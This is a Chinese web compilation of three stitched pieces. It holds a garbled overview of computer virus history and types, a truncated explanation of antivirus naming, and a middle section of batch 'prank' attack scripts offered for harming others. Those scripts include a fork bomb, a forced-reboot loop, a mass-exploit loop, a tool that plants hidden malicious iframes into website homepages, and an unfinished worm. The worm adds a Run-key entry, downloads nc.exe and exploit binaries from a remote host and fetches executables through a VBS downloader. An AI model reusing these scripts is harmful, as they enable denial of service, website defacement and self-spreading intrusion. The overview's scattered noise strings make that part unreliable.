篇一:电脑病毒大全
电脑病毒大全
提起计算机病毒,相信绝大多数用户都不会陌生(即使那些没有接触过计算机的人大多也听说过),有些用户甚至还对计算机病毒有着切肤之痛,不过要问起计算机病毒是如何产生的、病毒到底有些什么特征,能够回答生来的用户可能并不多。为此,本人特将有关计算机病毒的定义、起源、历史、特征、传播途径、分类、最新动态、错误认识、防毒原则、解决病毒的办法等内容汇集成文,希望能对广大用户曰常的反病
毒操作有所帮助:
一、病毒定义'
计算机病毒是指那些具有自我复制能力的计算机程序,它能影响计算机软件、硬件的正常运行,破坏
数据的正确与完整。
二、病毒起源
计算机病毒的来源多种多样,有的是计算机工作人员或业余爱好者为了纯粹寻开心而制造出来的,有的则是软件公司为保护自己的产品被非法拷贝而制造的报复性惩罚,因为他们发现病毒比加密对付非法拷贝更有效且更有威胁,这种情况助长了病毒的传播。还有一种情况就是蓄意破坏,它分为个人行为和ZF行为两种。个人行为多为雇员对雇主的报复行为,而ZF行为则是有组织的战略战术手段(据说在海湾战争中,美国防部一秘密机构曾对伊拉克的通讯系统进行了有计划的病毒攻击,一度使伊拉克的国防通讯陷于瘫痪)。另外有的病毒还是用于研究或实验而设计的"有用"程序,由于某种原因失去控制扩散出实验室或研究所,
从而成为危害四方的计算机病毒。
三、病毒历史
病毒是如何一步步的从无到有、从小到大的发展到今天的地步的呢?下面的介绍可以解除你的这一疑
问:
概念的提出 "计算机病毒"这一概念是1977年由美国著名科普作家"雷恩"在一部科幻小说《P1的青春》中
提出X
1983年 美国计算机安全专家"考因"首次通过实验证明了病毒的可实现性。: [* v7 r7 q5 ]* w- l, h! u; a; $ X# x* p% v5 A$ o; & b5 ?% S9 {% U' C* D4 `1 F' U* w$
1987年 世界各地的计算机用户几乎同时发现了形形色色的计算机病毒,如大麻、IBM圣诞树、黑色星
期五等等,面对计算机病毒的突然袭击,众多计算机用户甚至专业人员都惊慌失措。
1989年 全世界的计算机病毒攻击十分猖獗,我国也未幸免。其中"米开朗基罗"病毒给许多计算机用户造
成极大损失。
1991年 在"海湾战争"中,美军第一次将计算机病毒用于实战,在空袭巴格达的战斗中,成功地破坏了
对方的指挥系统,使之瘫痪,保证了战斗的顺利进行,直至最后胜利。
1992年 出现针对杀毒软件的"幽灵"病毒,如One-half。
1996年 首次出现针对微软公司Office的"宏病毒, f# B7 L. b# v; u) x; i5 U7 G7 ]* f9 R5 D+ v/ J!
1997年 1997年被公认为计算机反病毒界的"宏病毒"年。"宏病毒"主要感染WORD、EXCEL等文件。如Word宏病毒,早期是用一种专门的Basic语言即WordBasic所编写的程序,后来使用Visual Basic。与其它计算机病毒一样,它能对用户系统中的可执行文件和数据文本类文件造成破坏。常见的如:Tw no. 1(台
湾一号)、Se**、Consept、Mdma等。, [7 K E* R& P2 W2 W4 ^
1998年 出现针对Windows95/98系统的病毒,如CIH(1998年被公认为计算机反病毒界的CIH病毒年)。CIH病毒是继DOS病毒、Windows病毒、宏病毒后的第四类新型病毒。这种病毒与DOS下的传统病毒有很大不同,它使用面向Windows的VXD技术编制。1998年8月份从台湾传入国内,共有三个版本:1. 2版/1. 3版/1. 4版,发作时间分别是4月26曰/6月26曰/每月26曰。该病毒是第一个直接攻击、破坏硬件的计算机病毒,是迄今为止破坏最为严重的病毒。它主要感染Windows95/98的可执行程序,发作时破坏计算机Flash BIOS芯片中的系统程序,导致主板损坏,同时破坏硬盘中的数据。病毒发作时,硬盘驱动器不停旋转,硬盘上所有数据(包括分区表)被破坏,必须重新FDISK方才有可能挽救硬盘;同时,对于部分厂牌
的主板(如技嘉和微星等),会将Flash BIOS中的系统程序破坏,造成开机后系统无反应。* g" B* _* G4 q4 Z
1999年 Happy99等完全通过Internet传播的病毒的出现标志着Internet病毒将成为病毒新的增长点。其特点就是利用Internet的优势,快速进行大规模的传播,从而使病毒在极短的时间内遍布全球。
四、病毒的特征 $ z' | R- E, E; V/ @1 R% a- y) l' I/ O+ Z4 j/ q( f0
提起病毒,大家都很熟悉,可说到病毒到底有哪些特征,能有说出个所以然的用户却不多,许多用户甚至根本搞不清到底什么是病毒,这就严重影响了对病毒的防治工作。有鉴于此,特将常见病毒的特征简
要介绍如下,希望广大用户能藉以对病毒有一个较完善的灵性认识。
1. 传染性
传染性是病毒的基本特征。在生物界,通过传染病毒从一个生物体扩散到另一个生物体。在适当的条件下,它可得到大量繁殖,并使被感染的生物体表现出病症甚至死亡。同样,计算机病毒也会通过各种渠道从已被感染的计算机扩散到未被感染的计算机,在某些情况下造成被感染的计算机工作失常甚至瘫痪。与生物病毒不同的是,计算机病毒是一段人为编制的计算机程序代码,这段程序代码一旦进入计算机并得以执行,它会搜寻其他符合其传染条件的程序或存储介质,确定目标后再将自身代码插入其中,达到自我繁殖的目的。只要一台计算机染毒,如不及时处理,那么病毒会在这台机子上迅速扩散,其中的大量文件(一般是可执行文件)会被感染。而被感染的文件又成了新的传染源,再与其他机器进行数据交换或通过
网络接触,病毒会继续进行传染。
正常的计算机程序一般是不会将自身的代码强行连接到其它程序之上的。而病毒却能使自身的代码强行传染到一切符合其传染条件的未受到传染的程序之上。计算机病毒可通过各种可能的渠道,如软盘、计算机网络去传染其它的计算机。当你在一台机器上发现了病毒时,往往曾在这台计算机上用过的软盘已感染上了病毒,而与这台机器相联网的其它计算机也许也被该病毒侵染上了。是否具有传染性是判别一个程
序是否为计算机病毒的最重要条件
2. 未经授权而执行
一般正常的程序是由用户调用,再由系统分配资源,完成用户交给的任务。其目的对用户是可见的、透明的。而病毒具有正常程序的一切特性,它隐藏再正常程序中,当用户调用正常程序时窃取到系统的控制权,
先于正常程序执行,病毒的动作、目的对用户时未知的,是未经用户允许的。
3. 隐蔽性
病毒一般是具有很高编程技巧、短小精悍的程序。通常附在正常程序中或磁盘较隐蔽的地方,也有个别的以隐含文件形式出现。目的是不让用户发现它的存在。如果不经过代码分析,病毒程序与正常程序是不容易区别开来的。一般在没有防护措施的情况下,计算机病毒程序取得系统控制权后,可以在很短的时间5 z$ N# ~9 w7 Q4 I0 Q) u
里传染大量程序。而且受到传染后,计算机系统通常仍能正常运行,使用户不会感到任何异常。试想,如果病毒在传染到计算机上之后,机器马上无法正常运行,那么它本身便无法继续进行传染了。正是由于隐蔽性,计算机病毒得以在用户没有察觉的情况下扩散到上百万台计算机中。大部分的病毒的代码之所以设计得非常短小,也是为了隐藏。病毒一般只有几百或1k字节,而PC机对DOS文件的存取速度可达每秒几百KB以上,所以病毒转瞬之间便可将这短短的几百字节附着到正常程序之中,使人非常不易被察觉。 + F# R, S8 F,W! e8 q+
4. 潜伏性
大部分的病毒感染系统之后一般不会马上发作,它可长期隐藏在系统中,只有在满足其特定条件时才启动其表现(破坏)模块。只有这样它才可进行广泛地传播。如"PETER-2"在每年2月27曰会提三个问题,答错后会将硬盘加密。著名的"黑色星期五"在逢13号的星期五发作。国内的"上海一号"会在每年三、六、九月的13曰发作。当然,最令人难忘的便是26曰发作的CIH。这些病毒在平时会隐藏得很好,只有在发作
曰才会露出本来面目
5. 破坏性7 P9 C" ?. |1 l9 L/ T
任何病毒只要侵入系统,都会对系统及应用程序产生程度不同的影响。轻者会降低计算机工作效率,占用系统资源,重者可导致系统崩溃。由此特性可将病毒分为良性病毒与恶性病毒。良性病度可能只显示些画面或出点音乐、无聊的语句,或者根本没有任何破坏动作,但会占用系统资源。这类病毒较多,如:GENP、小球、W-BOOT等。恶性病毒则有明确得目的,或破坏数据、删除文件或加密磁盘、格式化磁盘,有的对数据造成不可挽回的破坏。这也反映出病毒编制者的险恶用心(最著名的恐怕就是CIH病毒了)
6. 不可预见性
从对病毒的检测方面来看,病毒还有不可预见性。不同种类的病毒,它们的代码千差万别,但有些操作是共有的(如驻内存,改中断)。有些人利用病毒的这种共性,制作了声称可查所有病毒的程序。这种程序的确可查出一些新病毒,但由于目前的软件种类极其丰富,且某些正常程序也使用了类似病毒的操作甚至借鉴了某些病毒的技术。使用这种方法对病毒进行检测势必会造成较多的误报情况。而且病毒的制作技
术也在不断的提高,病毒对反病毒软件永远是超前的
看了上面的介绍,你是不是对计算机病毒有了一个初步的了解?
五、病毒的传播途径
1. 通过不可移动的计算机硬件设备进行传播(即利用专用ASIC芯片和硬盘进行传播)。这种病毒虽然极少,
但破坏力却极强,目前尚没有较好的检测手段对付。. H* B7 _/ n3 _' a# D. B# E% u. Y6 J5 g. U( l1 `; J) ?% W- ?
2. 通过移动存储设备来传播(包括软盘、磁带等)。其中软盘是使用最广泛移动最频繁的存储介质,因此
也成了计算机病毒寄生的"温床"。 6 j e6 f) U# ?
3. 通过计算机网络进行传播。随着Internet的高速发展,计算机病毒也走上了高速传播之路,现在通过
网络传播已经成为计算机病毒的第一传播途径。
4. 通过点对点通信系统和无线通道传播。
六、病毒的分类* R# r: C4 q3 ~! F' d; F
各种不同种类的病毒有着各自不同的特征,它们有的以感染文件为主、有的以感染系统引导区为主、大多数病毒只是开个小小的玩笑、但少数病毒则危害极大(如臭名昭著CIH病毒),这就要求我们采用适当
的方法对病毒进行分类,以进一步满足曰常操作的需要:'
1. 按传染方式分类p 6 Y# e. o9 |9 K; ^) A3 R) Q( A* @* E1 c% J- d1
病毒按传染方式可分为引导型病毒、文件型病毒和混合型病毒三种。其中引导型病毒主要是感染磁盘的引导区,我们在使用受感染的磁盘(无论是软盘还是硬盘)启动计算机时它们就会首先取得系统控制权,驻留内存之后再引导系统,并伺机传染其它软盘或硬盘的引导区,它一般不对磁盘文件进行感染;文件型病毒一般只传染磁盘上的可执行文件(COM,EXE),在用户调用染毒的可执行文件时,病毒首先被运行,然后病毒驻留内存伺机传染其他文件或直接传染其他文件,其特点是附着于正常程序文件,成为程序文件的一个外壳或部件;混合型病毒则兼有以上两种病毒的特点,既染引导区又染文件,因此扩大了这种病毒
的传染途径。
按连接方式分类
病毒按连接方式分为源码型病毒、入侵型病毒、操作系统型病毒、外壳型病毒等四种。其中源码病毒主要攻击高级语言编写的源程序,它会将自己插入到系统的源程序中,并随源程序一起编译、连接成可执行文件,从而导致刚刚生成的可执行文件直接带毒,不过该病毒较为少见,亦难以编写;入侵型病毒则是那些用自身代替正常程序中的部分模块或堆栈区的病毒,它只攻击某些特定程序,针对性强,一般情况下也难以被发现,清除起来也较困难;操作系统病毒则是用其自身部分加入或替代操作系统的部分功能,危害性较大;外壳病毒主要是将自身附在正常程序的开头或结尾,相当于给正常程序加了个外壳,大部份的
文件型病毒都属于这一类
3. 按破坏性分类
病毒按破坏性可分为良性病毒和恶性病毒。顾名思义,良性病毒当然是指对系统的危害不太大的病毒,它一般只是作个小小的恶作剧罢了,如破坏屏幕显示、播放音乐等(需要注意的是,即使某些病毒不对系统造成任何直接损害,但它总会影响系统性能,从而造成了一定的间接危害);恶性病毒则是指那些对系统进行恶意攻击的病毒,它往往会给用户造成较大危害,如最近十分流行的CIH病毒就就属此类,它不仅
删除用户的硬盘数据,而且还破坏硬件(主板),实可谓"十恶不赦"!
4. 按程序运行平台分类
病毒按程序运行平台分类可分为DOS病毒、Windows病毒、Windows NT病毒、OS/2病毒等,它们分别
发作于DOS、Windows 9X、Windows NT、OS/2等操作系统平台上的病毒。
5. 新型病毒
部分新型病毒由于其独特性而暂时无法按照前面的类型进行分类,如宏病毒、黑客软件、电子邮件病
毒等。
宏病毒主要是使用某个应用程序自带的宏编程语言编写的病毒,如感染WORD系统的WORD宏病毒、感染EXCEL系统的EXCEL宏病毒和感染Lotus Ami Pro的宏病毒等。宏病毒与以往的病毒有着截然不同的特点,如它感染数据文件,彻底改变了人们的"数据文件不会传播病毒"的错误认识;宏病毒冲破了以往病毒在单一平台上传播的局限,当WORD、EXCEL这类软件在不同平台(如WINDOWS、WINDOWS NT、OS/2和MACINTOSH等)上运行时,就可能会被宏病毒交叉感染;以往病毒是以二进制的计算机机器码形式出现,而宏病毒则是以人们容易阅读的源代码形式出现,所以编写和修改宏病毒比以往病毒更容易;另外宏病毒还具有容易传播、隐蔽性强、危害巨大等特点。最终来说,宏病毒应该算是一种特殊的文件型病毒,同时它应该也可以5 b! r! e. [4 k! f
算是"按程序运行平台分类"中的一种特例。 ! ` A6 W. u9
黑客软件本身并不是一种病毒,它实质是一种通讯软件,而不少别有用心的人却利用它的独特特点来通过网络非法进入他人计算机系统,获取或篡改各种数据,危害信息安全。正是由于黑客软件直接威胁各个广大网民的数据安全,况且用户手工很难对其进行防范的独特特点,因此各大反病毒厂商纷纷将黑客软件纳
入病毒范围,利用杀毒软件将黑客从用户的计算机中驱逐出境,从而保护了用户的网络安全
电子邮件病毒实际上并不是一类单独的病毒,它严格来说应该划入到文件型病毒及宏病毒中去,只不过由于这些病毒采用了独特的电子邮件传播方式(其中不少种类还专门针对电子邮件的传播方式进行了优
化),因此我们习惯于将它们定义为电子邮件病毒。
七、最新动态( L) e- G2 G4 _%
近一段时间以来,计算机病毒不但没有象人们想象的那样随着Internet的流行而趋于消亡,而是进一步的爆发流行,如CIH、Happy99等,它们与以往的病毒相比具有一些新的特点,如传染性、隐蔽性、破坏性等,给广大计算机用户带来了极大的经济损失。为方便用户的使用,现将计算机病毒的最新动态向大家
做一个简要介绍: T1 G7 Q' x: c/ c+
多形性病毒 多形性病毒又名"幽灵"病毒,是指采用特殊加密技术编写的病毒,这种病毒在每感染一个对象时采用随机方法对病毒主体进行加密,因而完全多形性病毒的主要不同样本中甚至不存在连续两个相同的字节。这种病毒主要是针对查毒软件而设计的,所以使得查毒软件的编写更困难,并且还会带来许多误
报, p8 v+ [7 m; m: Y
轻微破坏病毒 文件备份是人们用于对抗病毒的一种常用的方法,轻微破坏病毒就是针对备份而设计的。它每次只破坏一点点数据,用户难以察觉,这就导致用户每次备份的数据均是已被破坏的内容。当用
户发觉到数据被彻底破坏时,可能所有备份中的数据均是被破坏的,这时的损失是难以估计的。 宏病毒 宏病毒是使用某种应用程序自带的宏编程语言编写的病毒,目前国际上已发现五类:Word宏病毒、Excel宏病毒、Access宏病毒、Ami Pro宏病毒、Word Perfect宏病毒。其中Word宏病毒最多,流行最范围最广,96年下半年开始在我国出现,97年在全国各地广泛流行,成为目前最主要的病毒,如Tw No.
1(台湾一号)、Concept(概念)、Se**、Cap、MdMa(无ZF一号)等。, A, P! X! B! }1
病毒生成工具 病毒生成工具通常是以菜单形式驱动,只要是具备一点计算机知识的人,利用病毒生成工具就可以象点菜一样轻易地制造出计算机病毒,而且可以设计出非常复杂的具有偷盗和多形性特征的病
毒。如:G2、VCL、MTE、TPE等。
黑客软件 黑客软件本身并不是一种病毒,它实际上是一种通讯软件,而不少别有用心的人却利用它的独特特点来通过网络非法进入他人计算机系统,获取或篡改各种数据,危害信息安全。正是由于黑客软件直接威胁各个广大网民的数据安全,况且用户手工很难对其进行防范,因此各大反病毒厂商纷纷将黑客软件纳入病毒范围,利用杀毒软件将黑客从用户的计算机中驱逐出境(黑客软件对既没有上Internet、又没
有连局域网纯粹的单机没有危害)。% J2 h. l4 L8 ~1 T
电子邮件病毒 电子邮件病毒实际上并不是一类单独的病毒,它严格来说应该划入到文件型病毒及宏病毒中去,只不过由于这些病毒采用了独特的电子邮件传播方式(其中不少种类还专门针对电子邮件的传播方式进行了优化,如前一段时间曾爆发流行的Happy99),因此我们习惯于将它们定义为电子邮件病毒。# q, b& f4 J0 d( p
篇二:一些bat恶搞代码
第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0
就这3行了
第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
if not exist c:\2.txt echo. >c:\2.txt & goto err1
if not exist c:\3.txt echo. >c:\3.txt & goto err1
if not exist c:\4.txt echo. >c:\4.txt & goto err1
if not exist c:\5.txt echo. >c:\5.txt & goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可以让对方电脑重启5次后不在重启
第三个:自动踢人(3389肉机保护自己专用)
@echo off
logoff 1
del log.bat
logoff后面的1改成自己登陆的ID号,用query user查看
第四个: 批量自动溢出
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
先自己用NC监听端口,多开几个,然后指行,就自动溢出了
第五个:自动挂马改主页
@echo off
cls
rem 直接打批处理名字就有帮助
title 批量挂马,改首页(伤脑筋 QQ:447228437).
color A
set pan=%1
set ye=%2
set dai=%3
if "%pan%"=="" goto e1
if "%ye%"=="" goto e1
if "%dai%"=="" goto e1
if "%dai%"=="htm.txt" goto u1
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://%dai%" width="0" height="0" frameborder="0"^> >>@path" echo.
echo代码全部插入完毕!!!!
echo.
pause
goto e1
:u1
echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容. echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl+c取消操作. pause
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y"
echo.
echo 首页全部更改完必!!!!如果您发现没有替换成功,请将%ye%文件只读属性去掉.
echo.
pause
:e1
echo.
echo 本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下
echo 用法:snj ^<搜索盘符^> ^<文件名^> ^<网马地址^>
echo 例子:snj d:\ index.asp /mm.htm
echo 批处理将自动添加^<iframe^>标记
echo.
echo 如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.
echo 然后将要更改的代码加COPY到里面保存.然后将命令的^<网马地址^>项输入为htm.txt即可.
echo 例子:snj d:\ index.asp htm.txt
echo.
echo 为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让
命令保持在一行才能正确执行.
echo.
echo 使用此批处理造成一切后果本人概不负责,请大家谨慎使用!
echo.
第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒
本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.
这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完 del c:\42.exe
del c:\nc.exe
del c:\ip.exe
echo dim wsh > %systemroot%\help\test.vbs
echo set
wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810
< %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
echo dim wsh > %systemroot%\help\test2.vbs
echo set
wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test2.vbs echo wsh.run "cmd /c
start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs echo open 10.0.0.5 > %systemroot%\help\ftp.txt
echo open myyes >> %systemroot%\help\ftp.txt
echo 1 >> %systemroot%\help\ftp.txt
echo binary >> %systemroot%\help\ftp.txt
echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt
echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt
echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt
echo bye >> %systemroot%\help\ftp.txt
echo echo Set xPost = CreateObject("Microsoft.XMLHTTP")
^>1.vbs > %systemroot%\help\or.txt
echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0
^>^>1.vbs >> %systemroot%\help\or.txt
echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo Set sGet = CreateObject("ADODB.Stream")
^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Write(xPost.responseBody)
^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.SaveToFile "d:\my.exe",2
^>^>1.vbs >> %systemroot%\help\or.txt
echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt
echo Windows Registry Editor Version 5.00 > %systemroot%\help\1.reg echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1.reg
echo "SKYNET Personal FireWall"="F:\\系统安全工具
\\FireWall\\PFW.exe" >> %systemroot%\help\1.reg
echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg
if not exist %systemroot%\help\good.bat copy
good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat
regedit -s %systemroot%\help\1.reg
ftp -s:%systemroot%\help\ftp.txt
move c:\nc.exe %systemroot%\help\ /y
move c:\42.exe %systemroot%\help\ /y
move c:\ip.exe %systemroot%\help\ /y
%systemroot%\help\test.vbs
rem for /f %%i in (result1.txt) do set a=%%i
rem for /f %%j in (result.txt) do 42 %a% %%j 810
准备:
1:找一个反向连接的溢出攻击程序,如ms06040漏洞
2:找呀一个免费FTP空间,最好是送域名的
3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.
思路:
用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功, 如果成功开启一个NC监听端口,NC后面带一个 < 输入符号
输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.
把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下
因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下
echo dim wsh > %systemroot%\help\test.vbs
echo set
wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810
< %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
生成随机IP工具的VB代码
Private Sub Form_Load()
Dim fso As New FileSystemObject
Dim a, b, c, d As Integer
Dim ph, e As String
ph = App.Path & "\" & "ip.txt"
Randomize
a = Int(253 * Rnd + 1)
b = Int(253 * Rnd + 1)
c = Int(240 * Rnd + 1)
Open ph For Output As #1
For i = c To c + 7
For j = 1 To 254
e = a & "." & b & "." & i & "." & j Print #1, e
DoEvents
Next j
Next i
Close #1
Unload Me
End Sub
篇三:电脑病毒名称 表格
电脑病毒名称及特性 whf
世界上那么多的病毒,反病毒公司为了方便管理,他们会按照病毒的特性,将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样,但大体都是采用一个统一的命名方法来命名的。一般格式为:<病毒前缀>.<病毒名>.<病毒后缀> 。
病毒前缀是指一个病毒的种类,他是用来区别病毒的种族分类的。不同的种类的病毒,其前缀也是不同的。比如我们常见的木马病毒的前缀 Trojan ,蠕虫病毒的前缀是 Worm 等等还有其他的。
病毒名是指一个病毒的家族特征,是用来区别和标识病毒家族的,如以前著名的CIH病毒的家族名都是统一的“ CIH ”,还有近期闹得正欢的振荡波蠕虫病毒的家族名是“ Sasser ”。
病毒后缀是指一个病毒的变种特征,是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示,如 Worm.Sasser.b 就是指 振荡波蠕虫病毒的变种B,因此一般称为 “振荡波B变种”或者“振荡波变
种B”。如果该病毒变种非常多(也表明该病毒生命力顽强 ^_^),可以采用数字与字母混合表示变种标识。
综上所述,一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型,就可以对这个病毒有个大概的评估(当然这需要积累一些常见病毒类型的相关知识,这不在本文讨论范围)。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。
下面附带一些常见的病毒前缀的解释(针对我们用得最多的Windows操作系统):
免费论文网友情提示:本网站所有内容为共享上传提供,不涉及任何商业利益,本站对此不承担任何保证责任!
Copyright © www.csmayi.cn Corporation, All Rights Reserved 共享时代 共享你我他 版权所有